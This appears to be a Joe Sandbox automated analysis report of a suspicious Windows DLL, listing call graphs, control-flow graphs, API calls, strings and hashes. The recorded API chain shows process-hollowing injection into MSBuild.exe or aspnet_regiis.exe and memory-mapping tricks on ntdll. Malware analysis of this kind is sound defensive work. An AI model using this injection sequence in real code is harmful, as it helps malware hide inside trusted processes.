6d390041 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12890->12893 12892 6d390161 12892->12681 12893->12892 12894 6d39001e 12895 6d39002c 12894->12895 12896 6d390027 12894->12896 12900 6d38fee8 12895->12900 12915 6d3901b0 12896->12915 12902 6d38fef4 ___scrt_is_nonwritable_in_current_image 12900->12902 12901 6d38ff1d dllmain_raw 12903 6d38ff03 12901->12903 12905 6d38ff37 dllmain_crt_dispatch 12901->12905 12902->12901 12902->12903 12904 6d38ff18 12902->12904 12906 6d38eb40 __DllMainCRTStartup@12 5 API calls 12904->12906 12905->12903 12905->12904 12907 6d38ff58 12906->12907 12908 6d38ff89 12907->12908 12910 6d38eb40 __DllMainCRTStartup@12 5 API calls 12907->12910 12908->12903 12909 6d38ff92 dllmain_crt_dispatch 12908->12909 12909->12903 12911 6d38ffa5 dllmain_raw 12909->12911 12912 6d38ff70 12910->12912 12911->12903 12913 6d38fe38 __DllMainCRTStartup@12 84 API calls 12912->12913 12914 6d38ff7e dllmain_raw 12913->12914 12914->12908 12916 6d3901c6 12915->12916 12918 6d3901cf 12916->12918 12919 6d390163 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12916->12919 12918->12895 12919->12918 12920 6d387e40 12952 6d387e60 __DllMainCRTStartup@12 12920->12952 12921 6d389d96 VirtualAlloc 12921->12952 12922 6d38ab4a NtWriteVirtualMemory 12922->12952 12923 6d38a370 CreateProcessW 12923->12952 12924 6d38ea8d NtCreateThreadEx 12924->12952 12925 6d387220 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12925->12952 12926 6d38d83c NtSetContextThread NtResumeThread 12926->12952 12927 6d38b245 NtWriteVirtualMemory 12927->12952 12928 6d38c83f NtWriteVirtualMemory 12928->12952 12929 6d38d584 NtCreateThreadEx 12929->12952 12930 6d38d9dd 12931 6d38fcd0 _ValidateLocalCookies 5 API calls 12930->12931 12932 6d38d9e7 12931->12932 12933 6d38e496 NtCreateThreadEx 12933->12952 12934 6d38cd94 NtWriteVirtualMemory 12934->12952 12935 6d38dd0d NtWriteVirtualMemory 12935->12952 12936 6d38a4aa NtGetContextThread 12936->12952 12937 6d38dd9a NtWriteVirtualMemory 12937->12952 12938 6d38deb6 NtWriteVirtualMemory 12938->12952 12939 6d38e6b8 NtWriteVirtualMemory 12939->12952 12940 6d38c6c7 NtReadVirtualMemory 12940->12952 12941 6d38e600 12942 6d3863e0 8 API calls 12941->12942 12943 6d38e613 NtAllocateVirtualMemory 12942->12943 12943->12952 12944 6d38aa84 NtAllocateVirtualMemory 12944->12952 12945 6d38d953 CloseHandle CloseHandle 12945->12952 12946 6d38e8da CloseHandle CloseHandle 12946->12952 12949 6d389999 GetConsoleWindow ShowWindow 12957 6d381930 12949->12957 12951 6d38db7e CreateProcessW 12951->12952 12952->12921 12952->12922 12952->12923 12952->12924 12952->12925 12952->12926 12952->12927 12952->12928 12952->12929 12952->12930 12952->12933 12952->12934 12952->12935 12952->12936 12952->12937 12952->12938 12952->12939 12952->12940 12952->12941 12952->12944 12952->12945 12952->12946 12952->12949 12952->12951 12953 6d381930 29 API calls 12952->12953 12955 6d38dbef NtGetContextThread 12952->12955 12956 6d38ae79 NtWriteVirtualMemory 12952->12956 12985 6d3863e0 12952->12985 12994 6d381000 12952->12994 12953->12952 12955->12952 12956->12952 12981 6d381959 ___scrt_uninitialize_crt __DllMainCRTStartup@12 12957->12981 12958 6d384224 CreateFileMappingA 12958->12981 12959 6d383c56 CloseHandle CloseHandle 12959->12981 12960 6d382f1e CreateFileMappingA 12960->12981 12961 6d383e0b CloseHandle 12961->12981 12962 6d384105 CloseHandle 12962->12981 12963 6d382772 K32GetModuleInformation 12963->12981 12964 6d383317 MapViewOfFile 12964->12981 12965 6d383223 CloseHandle 12965->12981 12966 6d384164 GetModuleHandleA 12966->12981 12967 6d384126 GetCurrentProcess 12967->12981 12968 6d383eeb 12969 6d38fcd0 _ValidateLocalCookies 5 API calls 12968->12969 12970 6d383ef5 12969->12970 12970->12952 12971 6d3824bb GetCurrentProcess 12971->12981 12972 6d383f7e CreateFileMappingA 12972->12981 12973 6d384282 MapViewOfFile 12973->12981 12974 6d384358 MapViewOfFile 12974->12981 12975 6d383efd CreateFileA 12975->12981 12976 6d3841a4 K32GetModuleInformation 12976->12981 12977 6d382593 GetModuleHandleA 12977->12981 12978 6d3837d9 VirtualProtect 12978->12981 12979 6d384337 CloseHandle 12979->12981 12980 6d38402b MapViewOfFile 12980->12981 12981->12958 12981->12959 12981->12960 12981->12961 12981->12962 12981->12963 12981->12964 12981->12965 12981->12966 12981->12967 12981->12968 12981->12971 12981->12972 12981->12973 12981->12974 12981->12975 12981->12976 12981->12977 12981->12978 12981->12979 12981->12980 12982 6d3838a4 VirtualProtect 12981->12982 12983 6d38288f CreateFileA 12981->12983 12984 6d3827fe GetModuleFileNameA 12981->12984 12982->12981 12983->12981 12984->12981 12989 6d3863fc __DllMainCRTStartup@12 12985->12989 12986 6d3870b0 GetModuleHandleW 12986->12989 12987 6d38681a GetModuleHandleW 12987->12989 12988 6d386985 NtQueryInformationProcess 12988->12989 12989->12986 12989->12987 12989->12988 12991 6d387096 12989->12991 12998 6d3843a0 12989->12998 12992 6d38fcd0 _ValidateLocalCookies 5 API calls 12991->12992 12993 6d3870a6 NtAllocateVirtualMemory 12992->12993 12993->12952 12995 6d38105f 12994->12995 12996 6d38fcd0 _ValidateLocalCookies 5 API calls 12995->12996 12997 6d381887 12996->12997 12997->12952 12999 6d3843d1 12998->12999 13000 6d38fcd0 _ValidateLocalCookies 5 API calls 12999->13000 13001 6d385f92 13000->13001 13001->12989 13002 6d3953c0 13003 6d3953cd 13002->13003 13004 6d393126 _free 14 API calls 13003->13004 13005 6d3953e7 13004->13005 13006 6d393183 _free 14 API calls 13005->13006 13007 6d3953f3 13006->13007 13008 6d393126 _free 14 API calls 13007->13008 13012 6d395419 13007->13012 13009 6d39540d 13008->13009 13011 6d393183 _free 14 API calls 13009->13011 13011->13012 13013 6d395425 13012->13013 13014 6d394952 13012->13014 13015 6d394771 _free 5 API calls 13014->13015 13016 6d39496e 13015->13016 13017 6d39498c InitializeCriticalSectionAndSpinCount 13016->13017 13018 6d394977 13016->13018 13017->13018 13018->13012
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Memory$Write$Thread$Create$CloseHandle$AllocateContext$ProcessWindow$AllocConsoleReadResumeShow
                                                                                          • String ID: .@$.@$0})O$0})O$8D-$9[9$@$@*N$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$DKW$DKW$MZx$X!-l$^_+2$_~D($i 0$kernel32.dll$ntdll.dll$o3*Z$o3*Z${)&N$}"D$}"D
                                                                                          • API String ID: 1499114107-2409534592
                                                                                          • Opcode ID: a3816b5ce3380652d77a693fa9c9d25f7040a2a2a1d50391ead8e86fd4d21c8c
                                                                                          • Instruction ID: f9f6762a83cf720b12b4dab2fa900c96035e4d650fc39e2ee0c136fc10779a5c
                                                                                          • Opcode Fuzzy Hash: a3816b5ce3380652d77a693fa9c9d25f7040a2a2a1d50391ead8e86fd4d21c8c
                                                                                          • Instruction Fuzzy Hash: D2C3F176A14611CFCB15CE3CC9D53DA7BF6BB8A311F009299D516DB395C33A8E8A8B10
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Handle$Module$CloseView$Create$CurrentInformationProcessProtectVirtual$MappingName
                                                                                          • String ID: +="~$@$KJ`$dCodePage$_p#$_p#
                                                                                          • API String ID: 4190414176-607597155
                                                                                          • Opcode ID: 7a28f8006e5bebb5eed58cc5f61f4dda38ddadecaa99894db187cba7c66756dc
                                                                                          • Instruction ID: 1fe2a281199b1f2e3606c4e7e9267c2214534b5d128dab76e8deb9cf4f3eb989
                                                                                          • Opcode Fuzzy Hash: 7a28f8006e5bebb5eed58cc5f61f4dda38ddadecaa99894db187cba7c66756dc
                                                                                          • Instruction Fuzzy Hash: 47232236B142058FDB14CE3CC9967DEBBFAAF8A310F009559D919DB392C73A89498F11

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1290 6d3863e0-6d3863f5 1291 6d3863fc-6d386407 1290->1291 1292 6d38640d-6d38641a 1291->1292 1293 6d387211-6d387214 1291->1293 1296 6d3870b0-6d3870c9 GetModuleHandleW 1292->1296 1297 6d386420-6d38642d 1292->1297 1294 6d38721b 1293->1294 1294->1291 1296->1294 1299 6d386433-6d386440 1297->1299 1300 6d387205-6d38720c 1297->1300 1302 6d386ce0-6d386ce7 1299->1302 1303 6d386446-6d386453 1299->1303 1300->1294 1302->1294 1305 6d386459-6d386466 1303->1305 1306 6d386fc0-6d387026 1303->1306 1308 6d38646c-6d386479 1305->1308 1309 6d386dfd-6d386e46 1305->1309 1306->1294 1311 6d38647f-6d38648c 1308->1311 1312 6d386b60-6d386bce 1308->1312 1309->1294 1314 6d386efa-6d386f01 1311->1314 1315 6d386492-6d38649f 1311->1315 1312->1294 1314->1294 1317 6d386fa2-6d386fa9 1315->1317 1318 6d3864a5-6d3864b2 1315->1318 1317->1294 1320 6d3864b8-6d3864c5 1318->1320 1321 6d38702b-6d387091 1318->1321 1323 6d386d3a-6d386da6 1320->1323 1324 6d3864cb-6d3864d8 1320->1324 1321->1294 1323->1294 1326 6d3871f9-6d387200 1324->1326 1327 6d3864de-6d3864eb 1324->1327 1326->1294 1329 6d3870fe-6d387108 1327->1329 1330 6d3864f1-6d3864fe 1327->1330 1329->1294 1332 6d3868ad-6d3868f6 1330->1332 1333 6d386504-6d386511 1330->1333 1332->1294 1335 6d386bd3-6d386c1c 1333->1335 1336 6d386517-6d386524 1333->1336 1335->1294 1338 6d38652a-6d386537 1336->1338 1339 6d386ab4-6d386abb 1336->1339 1341 6d38653d-6d38654a 1338->1341 1342 6d3871e6-6d3871f4 1338->1342 1339->1294 1344 6d386550-6d38655d 1341->1344 1345 6d3867a7-6d386815 1341->1345 1342->1294 1347 6d386563-6d386570 1344->1347 1348 6d386ea5-6d386ef5 1344->1348 1345->1294 1350 6d38681a-6d386878 GetModuleHandleW 1347->1350 1351 6d386576-6d386583 1347->1351 1348->1294 1350->1294 1353 6d386589-6d386596 1351->1353 1354 6d3868fb-6d386974 call 6d390900 1351->1354 1357 6d386dab-6d386db2 1353->1357 1358 6d38659c-6d3865a9 1353->1358 1354->1294 1357->1294 1361 6d3871da-6d3871e1 1358->1361 1362 6d3865af-6d3865bc 1358->1362 1361->1294 1364 6d386fae-6d386fbb 1362->1364 1365 6d3865c2-6d3865cf 1362->1365 1364->1294 1367 6d386979-6d386980 1365->1367 1368 6d3865d5-6d3865e2 1365->1368 1367->1294 1370 6d3865e8-6d3865f5 1368->1370 1371 6d3871bc-6d3871c3 1368->1371 1373 6d3865fb-6d386608 1370->1373 1374 6d386cec-6d386d35 1370->1374 1371->1294 1376 6d38660e-6d38661b 1373->1376 1377 6d386e57-6d386ea0 1373->1377 1374->1294 1379 6d3871c8-6d3871d5 1376->1379 1380 6d386621-6d38662e 1376->1380 1377->1294 1379->1294 1382 6d386634-6d386641 1380->1382 1383 6d386b06-6d386b4f 1380->1383 1385 6d3869cd-6d386a33 1382->1385 1386 6d386647-6d386654 1382->1386 1383->1294 1385->1294 1388 6d38665a-6d386667 1386->1388 1389 6d386985-6d3869c8 NtQueryInformationProcess 1386->1389 1391 6d38710d-6d387156 1388->1391 1392 6d38666d-6d38667a 1388->1392 1389->1294 1391->1294 1394 6d3870ce-6d3870f9 call 6d390900 1392->1394 1395 6d386680-6d38668d 1392->1395 1394->1294 1399 6d386c8c-6d386cdb 1395->1399 1400 6d386693-6d3866a0 1395->1400 1399->1294 1402 6d386b54-6d386b5b 1400->1402 1403 6d3866a6-6d3866b3 1400->1403 1402->1294 1405 6d3866b9-6d3866c6 1403->1405 1406 6d386f54-6d386f9d 1403->1406 1408 6d38715b-6d38719f 1405->1408 1409 6d3866cc-6d3866d9 1405->1409 1406->1294 1408->1294 1411 6d3866df-6d3866ec 1409->1411 1412 6d386f06-6d386f4f 1409->1412 1414 6d386ac0-6d386b01 1411->1414 1415 6d3866f2-6d3866ff 1411->1415 1412->1294 1414->1294 1417 6d3871b0-6d3871b7 1415->1417 1418 6d386705-6d386712 1415->1418 1417->1294 1420 6d386718-6d386725 1418->1420 1421 6d386db7-6d386df8 1418->1421 1423 6d386e4b-6d386e52 1420->1423 1424 6d38672b-6d386738 1420->1424 1421->1294 1423->1294 1426 6d386a38-6d386aaf 1424->1426 1427 6d38673e-6d38674b 1424->1427 1426->1294 1429 6d386889-6d3868a8 call 6d3843a0 1427->1429 1430 6d386751-6d38675e 1427->1430 1429->1294 1433 6d386764-6d386771 1430->1433 1434 6d387096-6d3870af call 6d38fcd0 1430->1434 1439 6d38687d-6d386884 1433->1439 1440 6d386777-6d386784 1433->1440 1439->1294 1442 6d38678a-6d386797 1440->1442 1443 6d3871a4-6d3871ab 1440->1443 1445 6d38679d-6d3867a2 1442->1445 1446 6d386c21-6d386c87 1442->1446 1443->1294 1445->1294 1446->1294
                                                                                          APIs
                                                                                          • NtQueryInformationProcess.NTDLL ref: 6D3869AE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationProcessQuery
                                                                                          • String ID: AA.$NtQueryInformationProcess$ntdll.dll$w7A$w7A
                                                                                          • API String ID: 1778838933-1719475625
                                                                                          • Opcode ID: 4471ebfe318c886a0b981c4e7329114e80405b8ea51664021bd0b2f7263d23bd
                                                                                          • Instruction ID: 8e22e472f05e0d01cb4d44396226099bb14742fe8aaa3982d3ff646f1a13b5a5
                                                                                          • Opcode Fuzzy Hash: 4471ebfe318c886a0b981c4e7329114e80405b8ea51664021bd0b2f7263d23bd
                                                                                          • Instruction Fuzzy Hash: 1D723572A642018FCF05CEBCC6D53DEBBFABB86354F109516D512DB38AC33A99098B51

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1448 6d38fe38-6d38fe4b call 6d3906a0 1451 6d38fe4d-6d38fe4f 1448->1451 1452 6d38fe51-6d38fe73 call 6d390280 1448->1452 1453 6d38feba-6d38fec9 1451->1453 1456 6d38fee0-6d38fef9 call 6d39051a call 6d3906a0 1452->1456 1457 6d38fe75-6d38feb8 call 6d39034b call 6d390207 call 6d390669 call 6d38fecd call 6d3904ec call 6d38feda 1452->1457 1468 6d38ff0a-6d38ff11 1456->1468 1469 6d38fefb-6d38ff01 1456->1469 1457->1453 1472 6d38ff1d-6d38ff31 dllmain_raw 1468->1472 1473 6d38ff13-6d38ff16 1468->1473 1469->1468 1471 6d38ff03-6d38ff05 1469->1471 1475 6d38ffe3-6d38fff2 1471->1475 1478 6d38ffda-6d38ffe1 1472->1478 1479 6d38ff37-6d38ff48 dllmain_crt_dispatch 1472->1479 1473->1472 1476 6d38ff18-6d38ff1b 1473->1476 1480 6d38ff4e-6d38ff60 call 6d38eb40 1476->1480 1478->1475 1479->1478 1479->1480 1487 6d38ff89-6d38ff8b 1480->1487 1488 6d38ff62-6d38ff64 1480->1488 1490 6d38ff8d-6d38ff90 1487->1490 1491 6d38ff92-6d38ffa3 dllmain_crt_dispatch 1487->1491 1488->1487 1489 6d38ff66-6d38ff84 call 6d38eb40 call 6d38fe38 dllmain_raw 1488->1489 1489->1487 1490->1478 1490->1491 1491->1478 1493 6d38ffa5-6d38ffd7 dllmain_raw 1491->1493 1493->1478
                                                                                          APIs
                                                                                          • __RTC_Initialize.LIBCMT ref: 6D38FE7F
                                                                                          • ___scrt_uninitialize_crt.LIBCMT ref: 6D38FE99
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize___scrt_uninitialize_crt
                                                                                          • String ID:
                                                                                          • API String ID: 2442719207-0
                                                                                          • Opcode ID: a7017a494b6cdea0366035ec51b872ff165c419a75e8248ac8b974865b52c8af
                                                                                          • Instruction ID: 3ab387c68d32d346fa80bd8c7fd72b53d37d3dc385c68522731e5f01a91805cd
                                                                                          • Opcode Fuzzy Hash: a7017a494b6cdea0366035ec51b872ff165c419a75e8248ac8b974865b52c8af
                                                                                          • Instruction Fuzzy Hash: 5F41C473D0C31AEFDB219F65C841B6E7B79EF86B58F018116E9546B152D7318901CBA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1498 6d38fee8-6d38fef9 call 6d3906a0 1501 6d38ff0a-6d38ff11 1498->1501 1502 6d38fefb-6d38ff01 1498->1502 1504 6d38ff1d-6d38ff31 dllmain_raw 1501->1504 1505 6d38ff13-6d38ff16 1501->1505 1502->1501 1503 6d38ff03-6d38ff05 1502->1503 1506 6d38ffe3-6d38fff2 1503->1506 1508 6d38ffda-6d38ffe1 1504->1508 1509 6d38ff37-6d38ff48 dllmain_crt_dispatch 1504->1509 1505->1504 1507 6d38ff18-6d38ff1b 1505->1507 1510 6d38ff4e-6d38ff60 call 6d38eb40 1507->1510 1508->1506 1509->1508 1509->1510 1513 6d38ff89-6d38ff8b 1510->1513 1514 6d38ff62-6d38ff64 1510->1514 1516 6d38ff8d-6d38ff90 1513->1516 1517 6d38ff92-6d38ffa3 dllmain_crt_dispatch 1513->1517 1514->1513 1515 6d38ff66-6d38ff84 call 6d38eb40 call 6d38fe38 dllmain_raw 1514->1515 1515->1513 1516->1508 1516->1517 1517->1508 1519 6d38ffa5-6d38ffd7 dllmain_raw 1517->1519 1519->1508
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                          • String ID:
                                                                                          • API String ID: 3136044242-0
                                                                                          • Opcode ID: 6a1c3971f5376140c092a2d70c39c7029f1d29ca9b1bb3d6b2bbdb5f24eac923
                                                                                          • Instruction ID: 72c32aea81496ac1adb271f56e2103e0caf6f4a34846a5402aa8bff9b5c01863
                                                                                          • Opcode Fuzzy Hash: 6a1c3971f5376140c092a2d70c39c7029f1d29ca9b1bb3d6b2bbdb5f24eac923
                                                                                          • Instruction Fuzzy Hash: 29218E73D0861AAFDB229E55C841A7F3B79EF86B98B028115F9156B212C7328D418BA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1524 6d38fd31-6d38fd47 call 6d3906a0 call 6d39037b 1529 6d38fd4d-6d38fd65 call 6d390280 1524->1529 1530 6d38fe1e 1524->1530 1534 6d38fd6b-6d38fd7c call 6d3902dd 1529->1534 1535 6d38fe30-6d38fe37 call 6d39051a 1529->1535 1531 6d38fe20-6d38fe2f 1530->1531 1540 6d38fdcb-6d38fdd9 call 6d38fe14 1534->1540 1541 6d38fd7e-6d38fd97 call 6d39063d call 6d3901fb call 6d39021f call 6d391961 1534->1541 1540->1530 1546 6d38fddb-6d38fde5 call 6d390514 1540->1546 1558 6d38fd9c-6d38fda0 1541->1558 1552 6d38fe06-6d38fe0f 1546->1552 1553 6d38fde7-6d38fdf0 call 6d39043b 1546->1553 1552->1531 1553->1552 1559 6d38fdf2-6d38fe04 1553->1559 1558->1540 1560 6d38fda2-6d38fda9 call 6d3902b2 1558->1560 1559->1552 1560->1540 1564 6d38fdab-6d38fdc8 call 6d39191c 1560->1564 1564->1540
                                                                                          APIs
                                                                                          • __RTC_Initialize.LIBCMT ref: 6D38FD7E
                                                                                            • Part of subcall function 6D3901FB: InitializeSListHead.KERNEL32(6D3EBF88,6D38FD88,6D39F0D8,00000010,6D38FD19,?,?,?,6D38FF41,?,00000001,?,?,00000001,?,6D39F120), ref: 6D390200
                                                                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D38FDE8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                          • String ID:
                                                                                          • API String ID: 3231365870-0
                                                                                          • Opcode ID: ad6a38c53aec16485b7c3d629c28c7283b64c3c313242b365c07eaed9c3340f7
                                                                                          • Instruction ID: 9191aa2da19ba893fb18f62324a9b3f71a8d965b00ea64f21035b01650d66d85
                                                                                          • Opcode Fuzzy Hash: ad6a38c53aec16485b7c3d629c28c7283b64c3c313242b365c07eaed9c3340f7
                                                                                          • Instruction Fuzzy Hash: 4B21D23254C306AADB11AFB5D406BAE77619F0276DF05801AD7C16F2C3FB226145CAA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1567 6d394b5d-6d394b62 1568 6d394b64-6d394b7c 1567->1568 1569 6d394b8a-6d394b93 1568->1569 1570 6d394b7e-6d394b82 1568->1570 1572 6d394ba5 1569->1572 1573 6d394b95-6d394b98 1569->1573 1570->1569 1571 6d394b84-6d394b88 1570->1571 1574 6d394c03-6d394c07 1571->1574 1577 6d394ba7-6d394bb4 GetStdHandle 1572->1577 1575 6d394b9a-6d394b9f 1573->1575 1576 6d394ba1-6d394ba3 1573->1576 1574->1568 1578 6d394c0d-6d394c10 1574->1578 1575->1577 1576->1577 1579 6d394bc3 1577->1579 1580 6d394bb6-6d394bb8 1577->1580 1582 6d394bc5-6d394bc7 1579->1582 1580->1579 1581 6d394bba-6d394bc1 GetFileType 1580->1581 1581->1582 1583 6d394bc9-6d394bd2 1582->1583 1584 6d394be5-6d394bf7 1582->1584 1585 6d394bda-6d394bdd 1583->1585 1586 6d394bd4-6d394bd8 1583->1586 1584->1574 1587 6d394bf9-6d394bfc 1584->1587 1585->1574 1588 6d394bdf-6d394be3 1585->1588 1586->1574 1587->1574 1588->1574
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 6D394BA9
                                                                                          • GetFileType.KERNELBASE(00000000), ref: 6D394BBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleType
                                                                                          • String ID:
                                                                                          • API String ID: 3000768030-0
                                                                                          • Opcode ID: 9e5620d0af6a8a8cfec5b3cf6e9bb231c4fcb0cc1b946aae31621a66c8dcfa04
                                                                                          • Instruction ID: a18fbc9aa9b792d3b829bb117c5e1adb3278ebe8b5c84b102fbaa8fa6150365d
                                                                                          • Opcode Fuzzy Hash: 9e5620d0af6a8a8cfec5b3cf6e9bb231c4fcb0cc1b946aae31621a66c8dcfa04
                                                                                          • Instruction Fuzzy Hash: 8511B7B2608B525ADB314D3D8C857227AA8A74F230B24071AD1F59E1F1E3B1D542C758

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1589 6d3953c0-6d3953cb 1590 6d3953cd-6d3953d2 1589->1590 1591 6d3953d4-6d3953d6 1589->1591 1592 6d3953da 1590->1592 1593 6d3953d8 1591->1593 1594 6d3953df-6d3953e2 call 6d393126 1591->1594 1592->1594 1593->1592 1596 6d3953e7-6d3953fd call 6d393183 1594->1596 1599 6d39542a-6d39542d 1596->1599 1600 6d3953ff-6d395423 call 6d393126 call 6d393183 1596->1600 1602 6d395432-6d395465 call 6d394952 1599->1602 1600->1599 1612 6d395425-6d395429 1600->1612 1608 6d395470 1602->1608 1609 6d395467-6d39546a 1602->1609 1611 6d395477-6d395481 1608->1611 1609->1608 1610 6d39546c-6d39546e 1609->1610 1610->1608 1610->1611 1611->1602 1613 6d395483-6d395487 1611->1613
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: 067c20137160065a0596879428f2616c0703d993f3be06def05cd9fccce98165
